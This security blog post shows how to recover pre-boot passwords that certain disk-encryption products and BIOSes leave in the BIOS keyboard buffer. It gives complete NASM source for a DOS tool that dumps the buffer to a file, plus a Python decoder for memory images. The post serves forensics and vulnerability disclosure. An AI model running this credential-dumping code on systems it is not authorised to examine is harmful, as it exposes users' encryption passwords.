Duplicating Volatility Bioskbd Command Function on Live Windows Systems

I didn’t realize there was still much demand for pulling passwords from BIOS keyboard buffers until I saw that a “bioskbd” command had been added to the new 1.4 version of the Volatility Framework.

Examples of products that leak passwords in this manner:
Microsoft BitLocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
SecurStar’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)

These passwords can be retrieved from a live system running one of the vulnerable products. Below is assembly language source code for building such a tool. NASM (free) can be used to build your copy of the tool from the source below.

org 100h ; DOS .COM program: code starts at CS:0100h, CS = DS = ES = SS

section .text

mov ah, 09h
mov dx, welcome
int 0x21 ; display some greeting msg

mov ax, 0x40 ; 0x40:0x1e : BIOS keyboard buffer address
mov ds, ax

mov si, 0x1e
mov di, buffer
mov cx, 0x10 ; 16 entries, each a word of (ASCII byte, scan code byte)

leakloop:
mov ax, [ds:si] ; AL = ASCII byte, AH = scan code

xor ah, ah ; drop the scan code

cmp al, 0x20
jae keepcopying
mov ax, 0x20 ; below space: replace with a space

keepcopying:
cmp al, 0x7e
jb keepcopying2
mov ax, 0x20 ; 0x7e and above: replace with a space

keepcopying2:
mov [cs:di], ax ; store in our buffer (DS now points at 0x40, so address it via CS)
inc di
add si, byte +0x2 ; advance to the next buffer entry

loop leakloop ; if CX not 0, then decrement CX and loop back up

push es
pop ds ; restore DS (ES still holds the PSP segment)

mov ah, 0x3c ; MS DOS Create file Function
mov dx, fname
xor cx, cx ; normal file attributes
int 0x21

mov ax, 0x3d01 ; MS DOS Open file Function, write access (DX still points at fname)
int 0x21
mov bx, ax ; AX has the file handle if the open file call worked

mov ah, 0x40 ; MS DOS Write to handle Function
mov cx, 0x30 ; 48 bytes: the 32-byte Msg string plus the 16 copied characters
mov dx, Msg
int 0x21 ; Write buffer to file

mov ax, 0x4c00 ; Quit (function 4Ch, return code 0)
int 0x21

section .data

welcome db 10,13
db 'Dumping password to file : PASSLEAK.TXT',10,13
db 'Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.',10,13
db 'This is a circular buffer, so your password might wrap around to the front.',10,13
db 'It should have the last 16 printable characters typed at the login screen.',10,13
db '$',10,13

handle: dw 0
fname db 'Passleak.txt',0
Msg: db 'BIOS keyboard buffer contains: ',0
buffer: times 32 db 'X'
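To check a memory image (or a saved dump of low memory) for the same leak without running anything on the box, here is the decoding as a Python function. This is an added example, not the tool above or Volatility's bioskbd code; it applies the same printable filter as the NASM loop and goes one step further by using the BIOS tail pointer at 0040:001C to rotate the ring into typing order. The sample memory is constructed, not a real capture.

```python
import struct

# BIOS Data Area locations (physical addresses within segment 0x40)
KBD_HEAD = 0x41A     # 0040:001A  offset of the next entry to be read
KBD_TAIL = 0x41C     # 0040:001C  offset of the next free entry
KBD_BUF = 0x41E      # 0040:001E  start of the 16-entry ring buffer
KBD_ENTRIES = 16     # each entry is (ASCII byte, scan code byte)


def printable_or_space(b):
    """Same filter as the NASM tool: keep 0x20..0x7D, blank everything else."""
    return chr(b) if 0x20 <= b < 0x7E else " "


def decode_bios_kbd_buffer(mem):
    """Decode the keyboard ring from the low 0x440 bytes of physical memory.

    'linear' is the buffer as laid out in memory (what PASSLEAK.TXT shows);
    'unwrapped' rotates it so the last 16 keystrokes read in typing order,
    using the tail pointer when it lies inside the buffer.
    """
    raw = mem[KBD_BUF:KBD_BUF + 2 * KBD_ENTRIES]
    linear = "".join(printable_or_space(raw[i]) for i in range(0, len(raw), 2))
    head, tail = struct.unpack_from("<HH", mem, KBD_HEAD)
    # The slot at 'tail' is the next to be overwritten, i.e. the oldest of
    # the last 16 keystrokes, so reading from there gives chronological order.
    start = 0
    if 0x1E <= tail < 0x1E + 2 * KBD_ENTRIES:
        start = (tail - 0x1E) // 2
    unwrapped = linear[start:] + linear[:start]
    return {"linear": linear, "unwrapped": unwrapped, "head": head, "tail": tail}


def build_sample_mem():
    """Constructed sample: 'hunter2' + Enter typed after the ring already held
    'oldtext_', so the newest keys wrapped around to slots 0 and 1."""
    mem = bytearray(0x440)
    keys = ["2", "\r"] + list("oldtext_") + list("hunter")   # slot order 0..15
    for slot, ch in enumerate(keys):
        mem[KBD_BUF + 2 * slot] = ord(ch)                         # ASCII byte
        mem[KBD_BUF + 2 * slot + 1] = 0x1C if ch == "\r" else 0   # scan code (placeholder)
    struct.pack_into("<HH", mem, KBD_HEAD, 0x22, 0x22)  # all consumed: head == tail = slot 2
    return bytes(mem)


if __name__ == "__main__":
    info = decode_bios_kbd_buffer(build_sample_mem())
    print("as stored    :", repr(info["linear"]))
    print("typing order :", repr(info["unwrapped"]))
```

Feed it the first 0x440 bytes of a raw physical memory image; a BIOS that clears the buffer will yield only blanks.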


email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement

